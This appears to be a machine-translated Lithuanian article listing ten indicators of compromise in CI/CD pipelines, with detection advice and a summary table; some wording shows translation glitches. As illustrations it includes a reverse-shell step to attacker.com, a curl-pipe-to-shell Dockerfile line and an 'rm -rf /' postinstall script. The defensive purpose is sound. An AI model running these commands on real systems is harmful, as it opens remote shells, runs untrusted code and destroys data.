Įvadas: Kokie yra kibernetinio saugumo pažeidimų rodikliai?
Kompromitacijos indikatoriai yra pirmieji įspėjamieji ženklai, rodantys, kad jūsų sistema arba pipeline gali būti puolamas. Paprastai tariant, kompromiso rodikliai yra užpuolikų palikti pėdsakai, tarsi keisti logins, failų pakeitimai arba paslėpta kenkėjiška programa. TOK kibernetinis saugumas, jie veikia kaip pirštų atspaudai nusikaltimo vietoje, pateikdami aiškius įrodymus, kad kažkas negerai. Todėl, kai kūrėjai klausia kokie yra kompromiso požymiai, atsakymas neapsiriboja serveriais ar užkardomis, jis taip pat apima šiuolaikinėse sistemose slypinčias rizikas CI/CD pipelines.
Šiuose pipelineUžpuolikai gali nepastebimai keisti kodą, įdiegti kenkėjiškas priklausomybes arba keisti kūrimo veiksmus. Tačiau dauguma vadovų vis dar orientuoti tik į serverius arba tinklus. Dėl to programinės įrangos tiekimo grandinė tapo vienu lengviausių taikinių.
Štai kodėl reikia ieškoti kompromiso požymių CI/CD pipelineyra būtinas. Svarbiausia, kad jis padeda komandoms blokuoti kenkėjiškas programas, apsaugoti paslaptis ir užtikrinti kiekvieno programinės įrangos teikimo etapo saugumą.
10 svarbiausių kompromiso rodiklių CI/CD Pipelines
Aiškinant kompromitacijos požymius, daugumoje sąrašų daugiausia dėmesio skiriama serveriams arba tinklams. Vis dėlto CI/CD pipelineUžpuolikai palieka labai skirtingus pirštų atspaudus. Šių signalų atpažinimas yra labai svarbus norint aktyviai apsiginti. Žemiau pateikiamos 10 IOC kibernetinio saugumo raudonųjų vėliavėlių, į kurias turėtų atkreipti dėmesį kiekvienas kūrėjas ir saugumo inžinierius.
1. Įtartini priklausomybės pokyčiai
Vienas iš pagrindinių kompromiso rodiklių pipeline„s“ yra staigus, keistas priklausomybės atnaujinimas. Užpuolikai dažnai naudojasi patikimumu, kurį kūrėjai nustato paketų tvarkyklėse, norėdami pridėti pavojingus paketus.
Pavyzdžiui, npm a package.json skirtumas gali staiga apimti:
Tokie pakeitimai gali atrodyti saugūs, tačiau į kiekvieną versiją gali įterpti Trojos arkliu užkrėstą kodą.
Poveikis: pažeistos versijos paveldi kenkėjiškas programas iš šaltinio.
Aptikimas: vykdyti priklausomybių peržiūras, sekti užrakinimo failų skirtumus ir nuolat nuskaityti naujus paketus.
2. Užmaskuotas kodas versijose
Kenkėjiškų programų autoriai naudojasi obfuskacija, kad apeitų atsiliepimus. Dėl to šis kompromitacijos rodiklis CI/CD pipelinegali būti vienas sunkiausiai aptinkamų. Tiesą sakant, užmaskuoti naudingieji duomenys dažnai nepastebimai patenka į atvirojo kodo bibliotekas arba konteinerių atvaizdus.
Pavyzdžiui:
- PyPI paketas, naudojantis
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - „Docker“ atvaizdas, supakuotas su nereikalingais UPX dvejetainiais failais.
- JavaScript pilnas
\x41\x42pabėga slėpdamas įgaliojimų vagis.
Poveikis: Paslėptas kodas vykdomas tyliai kūrimo arba vykdymo metu, todėl tai yra labai svarbus IOC kibernetinio saugumo signalas.
Aptikimas: Derinti SAST su kenkėjiškų programų nuskaitymu, siekiant pažymėti užkoduotą arba supakuotą kodą. Svarbiausia, kad kodų klaidinimą vertintumėte kaip įspėjamąjį ženklą, kurį reikia toliau tirti.
3. „Git“ atskleistos paslaptys: klasikinė IOC kibernetinio saugumo rizika
CI/CD pipelinedažnai paveldi paslaptis tiesiai iš saugyklų. Tačiau kai „Git“ atsiranda paslaptys, jie tampa vienu aiškiausių atsakymų į klausimą „kokie yra kompromiso rodikliai?“ pipeline„s?“ Kai prisijungimo duomenys patenka į „Git“, užpuolikai gali jais pasinaudoti neribotą laiką.
Pavyzdžiui:
- A
.envfailą, kuriame yraAWS_SECRET_KEY=. - Įstumti žetonai
config.json. - Paslaptys vis dar matomos „Git“ istorijoje net ir pašalinus.
Poveikis: Atviri raktai suteikia užpuolikams tiesioginę prieigą prie CI/CD pipelines, debesų sistemose ar duomenų bazėse. Todėl tai yra vienas pavojingiausių kompromitacijos rodiklių.
Aptikimas: Paskirtis pre-commit hooks ir CI užduotis slaptam nuskaitymui bei nedelsiant atšaukite nutekintus raktus. Be to, vykdykite automatinius taisomuosius veiksmus, kad sumažintumėte atskleidimo laikotarpius.
4. Suklastotas Pipeline Konfigūracijos: paslėpti kompromiso rodikliai
Pipeline konfigūracijos yra didelės vertės tikslai, nes Vienas pakeitimas dažnai užgrobia visą darbo eigąTodėl, klastojami pipeline failai yra didelė TOK kibernetinio saugumo rizika, kurią tradicinės stebėjimo priemonės retai aptinka.
Pavyzdžiui:
„GitHub“ veiksmuose:
- „GitLab“: pridėta kenkėjiška užduotis
.gitlab-ci.ymlkuris išmeta jautrius duomenis. - Dženkinse:
sh "nc -e /bin/bash attacker.com 4444".
Poveikis: Šie nepatvirtinti pakeitimai paverčia jūsų pipeline tampa nuolatinėmis užpuolikų prieigos galimybėmis, o tai akivaizdžiai laikoma kompromitacijos rodikliu.
Aptikimas: Užtikrinti pasirašytų konfigūracijų naudojimą, reikalauti PR patvirtinimų ir stebėti netikėtus darbus. Be to, nustatyti guardrails kurie automatiškai blokuoja pakeistus darbo eigą.
5. Privilegijuotas IaC Pagal nutylėjimą
Neteisingai sukonfigūruoti infrastruktūros apibrėžimai dažnai sukuria paslėptas užpakalines duris. Dėl to privilegijuotos numatytosios funkcijos yra... IaC yra klasikinė TOK kibernetinio saugumo rizika.
Pavyzdžiui:
- „Kubernetes“ diegimo suteikimo pod'ai
privileged: true. - Helm diagramos atskleidžia paslaugas su
0.0.0.0:22.
Poveikis: Užpuolikai gauna root lygio prieigą arba viešai atskleidžia vidines paslaugas. Dėl to šios problemos žymiai išplečia atakų paviršių.
Aptikimas: Aplikuoti IaC nuskaitymas, siekiant užtikrinti minimalių privilegijų taikymą prieš sujungimą. Be to, įsitikinkite, kad kiekviena konfigūracija yra peržiūrėta kaip sujungimo dalis. pipeline.
6. Neįprastas sudėjimo elgesys
Užpuolikai dažnai keičia pipeline elgesys, dėl kurio gali praslysti kenkėjiški veiksmai. Kitaip tariant, neįprasta kūrimo veikla yra vienas aiškiausių atsakymų į klausimą, kas yra įsilaužimo požymiai CI/CD pipelines.
Pavyzdžiui:
- Sukuria išorines tinklo užklausas į nepažįstamus domenus.
- „Node.js“ projektas staiga paleidžia „PowerShell“
npm install. - CI užduotis, atsisiunčianti didelius dvejetainius failus, neapibrėžtus kūrimo scenarijuose.
Poveikis: Pažeistos versijos gali veikti kaip kenkėjiškų programų platinimo taškai. Svarbiausia, kad jos platina kenkėjišką informaciją kiekviename diegimo etape.
Aptikimas: Stebėkite kūrimo žurnalus, ar nėra netikėtų procesų ar ryšių. Be to, sukonfigūruokite anomalijų aptikimą, kad būtų pažymėtas neįprastas elgesys.
7. Kenkėjiški paketų scenarijai kaip IOC kibernetinio saugumo rizika
Paketų tvarkyklių palaikymo gyvavimo ciklas hooks kuriuos užpuolikai išnaudoja. Todėl kenkėjiški scenarijai „npm“, „PyPI“ arba „Dockerfiles“ yra stiprūs įsilaužimo rodikliai.
Pavyzdžiui:
- npm:
postinstallvykdomas scenarijusrm -rf /arba signalizavimas C2. - PyPI:
setup.pydiegimo metu vykdomas paslėptas Python kodas. - Dockerfile:
RUN curl attacker.sh | sh.
Poveikis: Ataka vykdoma diegimo metu, prieš atliekant bet kokį vykdymo laiko testavimą. Todėl kūrėjai gali to nepastebėti, kol nebus per vėlu.
Aptikimas: Nuskaitykite paketų manifestus, ar nėra diegimo scenarijų. Be to, apribokite rizikingą hooks in CI/CD darbo vietų, skirtų sumažinti poveikį.
8. Registro užkrėtimo rodikliai, rodantys kompromitaciją
Užpuolikai pakeičia arba modifikuoja registruose esančius artefaktus, ir šie įvykiai yra vadovėliniai pavyzdžiai, rodantys, kad tiekimo grandinėje yra pažeidimų. pipelines.
Pavyzdžiui:
- „Docker“ vaizdo žymė tyliai atnaujinta su Trojos arklio užkrėstu sluoksniu.
- Vidinis paketas pakeistas užnuodyta versija.
- npm vardų erdvės pritūpimai, pvz.
lodash-proxy.
Poveikis: Kiekviena registro artefaktą naudojanti versija tampa pažeidžiama. Negana to, pažeidimas plinta ir į žemesnio lygio paslaugas.
Aptikimas: Vykdyti parašo ir vientisumo patikrinimus visuose registro ištraukimuose. Be to, sekti artefaktų kilmę naudojant SBOM patvirtinimas.
9. Anomalinis naudotojų aktyvumas kaip IOC įrodymas
Pavojingos sąskaitos beveik visada palieka nenormalių pėdsakų. Atitinkamai, neįprastas kūrėjo elgesys yra stiprus kompromiso rodiklis.
Pavyzdžiui:
- Commits stumiamas 3 val. vietos laiku.
- Atostogaujančių sąskaitų PR patvirtinimai.
- Pipelinesuveikia neįprastu dažnumu.
Poveikis: Užpuolikai piktnaudžiauja pavogtais prisijungimo duomenimis, kad įterptų kenkėjiškus pakeitimus. Juk neleistini commitlengvai įsilieja į įprastus darbo procesus.
Aptikimas: monitorius SCM stebėti anomalijų buvimą, užtikrinti daugiafaktorinį autentifikavimą ir reguliariai keisti žetonus. Be to, įspėti apie įtartinus atvejus commit arba patvirtinimo modeliai.
10. Nepavykę TOK kibernetinio saugumo vientisumo arba parašo patikrinimai
Dažnas, bet ignoruojamas kompromiso rodiklis yra nepavykęs vientisumo arba parašo patikrinimas. IOC kibernetinio saugumo srityje šie patikrinimai patvirtina kodo ar artefaktų autentiškumą. Jų praleidimas palieka pipelines atidengtas.
Pavyzdžiai:
- SHA256 maišos kodas neatitinka laukiamos kontrolinės sumos.
- Trūkstamas arba negaliojantis GPG parašas.
- An SBOM rodomi nepasirašyti artefaktai.
Poveikis: Vientisumo sutrikimai dažnai reiškia klastojimą, registro užkrėtimą arba kenkėjiškų programų injekciją.
Aptikimas: Automatizuokite parašų patikrinimus, užtikrinkite kontrolinės sumos patvirtinimą ir blokuokite nepasirašytus komponentus. Svarbiausia, kad kiekvieną nepavykusį patikrinimą traktuokite kaip aiškų kompromitacijos įrodymą.
CI/CD Kompromiso rodikliai trumpai
| Kompromiso rodiklis (IOC) | Poveikis CI/CD Pipelines | Kaip aptikti |
|---|---|---|
| Įtartini priklausomybės pokyčiai | Užpuolikai į paketų tvarkykles įterpia kenkėjiškas bibliotekas, dėl kurių gali būti pažeistos kompiliacijos. | Stebėkite užrakinimo failų skirtumus, nuolat tikrinkite priklausomybes ir nuskaitykite priklausomybes. |
| Užmaskuotas kodas versijose | Paslėpti naudingieji duomenys vykdomi kūrimo arba vykdymo metu be aptikimo. | Paskirtis SAST ir kenkėjiškų programų nuskaitymas, siekiant pažymėti base64, šešioliktainį arba supakuotus kodo šablonus. |
| Git atskleistos paslaptys | Nutekėję žetonai arba API raktai suteikia užpuolikams tiesioginę prieigą prie svarbiausių sistemų. | Vykdykite slaptus nuskaitymus „Git“ programoje hooks ir automatiškai atšaukti nutekintus prisijungimo duomenis. |
| Suklastotas Pipeline Konfigūracijos | Modifikuoti darbo eigos leidžia duomenis išgauti arba išsaugoti viduje CI/CD. | Reikalauti PR patvirtinimų, užtikrinti pasirašytų konfigūracijų laikymąsi ir stebėti pipeline pokyčiai. |
| Privilegijuotas IaC Pagal nutylėjimą | Pernelyg liberalūs vaidmenys arba nesaugūs numatytieji nustatymai kenkia debesijos aplinkoms. | Nuskaitykite „Terraform“, „Kubernetes“ ir „Helm“ failus, ar nėra minimalių privilegijų. |
| Neįprastas sudėjimo elgesys | Pipelinenaudojami kaip kenkėjiškų programų platinimo taškai arba horizontaliam judėjimui. | Analizuokite kūrimo žurnalus, ar nėra netikėtų atsisiuntimų, procesų ar išeinančių skambučių. |
| Kenkėjiški paketų scenarijai | Paslėpti priešdiegimo/podiegimo scenarijai suaktyvina naudingąją apkrovą prieš vykdymo laiko testavimą. | Blokuoti rizikingus npm/PyPI scenarijus ir apriboti jų vykdymą CI/CD darbo vietų. |
| Registro apsinuodijimas | Trojanizuoti artefaktai registruose pakeičia patikimus atvaizdus arba dvejetainius failus. | Patikrinkite kontrolines sumas, užtikrinkite parašo patvirtinimą ir proaktyviai nuskaitykite registrus. |
| Anomali naudotojo veikla | Pažeistos paskyros skatina kenkėjiškas programas commits arba gaidukas pipelines. | Įgyvendinti MFA, stebėti commits anomalijoms ir analizuoti login modeliai. |
| Nepavykę vientisumo arba parašo patikrinimai | Rodo, kad į sistemą patenka modifikuotas kodas, priklausomybės arba vaizdai pipeline. | Automatizuokite vientisumo patikrinimus ir blokuokite nepasirašytus arba nesutampančius komponentus. |
Kodėl tradicinis TOK kibernetinis saugumas nepasiteisina CI/CD Rizika
Dauguma organizacijų jau stebi serverių, kompiuterių ar tinklų įsilaužimo rodiklius. Tačiau šis klasikinis IOC kibernetinio saugumo požiūris ignoruoja CI/CD pipelines, kurios dabar yra viena iš svarbiausių atakos paviršių. Tiesą sakant, pipelinerodo unikalius kompromisinius signalus, kurių tradiciniai įrankiai negali aptikti.
Tradicinio saugumo kompromiso rodikliai
Įprasto IOC kibernetinio saugumo srityje dėmesys paprastai skiriamas:
- Neįprastos logins arba IP adresus, kurie rodo pavogtus prisijungimo duomenis.
- Įtartini failų maišos kodai arba registro pakeitimai, atskleidžiantys kenkėjišką programinę įrangą.
- Netikėtas išeinantis srautas, rodantis duomenų nutekėjimą.
Tai gerai žinomi rodikliai, kurie taip pat stebimi MITER ATT&CK karkasas, kuris nubraižo įprastą priešininkų elgesį ir taktiką. Tai naudingi signalai. Tačiau jie daugiausia taikomi operacinėms sistemoms arba įmonių tinklams. Todėl jie nepastebi subtilaus klastojimo, kuris vyksta anksčiau programinės įrangos tiekimo grandinėje.
Kodėl CI/CD Pipelines yra skirtingi
CI/CD pipelineyra automatizuotos aplinkos, kuriose kūrėjai commit kodą, „pull“ priklausomybes ir išleidžiamas versijas. Užpuolikai žino, kad vienas įsilaužimas čia persiduoda visoms diegimo sistemoms. Taigi, kokie yra įsilaužimo požymiai CI/CD pipelineJie atrodo labai skirtingai:
- Kenkėjiška priklausomybė, tyliai pridėta prie package.json arba requirements.txt.
- API raktai arba žetonai, atskleisti „Git“ sistemoje commits arba .env failai.
- Į npm arba PyPI paketus įterptas užmaskuotas kodas.
- „Terraform“ arba „Kubernetes“ failai su nesaugiais numatytaisiais parametrais, pvz., privilegijuota: true.
- Pipeline užduotys, redaguotos siekiant išgauti duomenis arba atverti užpakalines duris.
Šie kompromisiniai signalai CI/CD likti nematomam standard saugumo įrankiai.
TOK kibernetinio saugumo spraga
Nors daugelis komandų supranta kompromitacijos indikatorių vertę, jos vis dar remiasi tik serverių ir tinklo žurnalų aptikimu. Todėl užpuolikai gali užkrėsti versijas arba įterpti kenkėjiškas programas nepalikdami įprastų pėdsakų. Štai kodėl tokie incidentai kaip „XZ Utils“ užpakalinės durys ar kenkėjiški npm paketai liko nepastebėti, kol nepasiekė gamybinės aplinkos.
Tokius tiekimo grandinės kompromisus taip pat pabrėžia CISA tiekimo grandinės saugumo gairės, kuriame įspėjama, kad užpuolikai vis dažniau taikosi į CI/CD pipelineir registrai.
Takeaway
Tradicinis TOK kibernetinis saugumas būtinas, bet nepakankamas. Svarbiausia, kad komandos turi atpažinti konkrečiam objektui būdingus pažeidimo požymius. CI/CD pipelines. Tik tada jie gali aptikti kenkėjišką kodą arba pipeline piktnaudžiavimą, kol jis neišplito į aplinką.





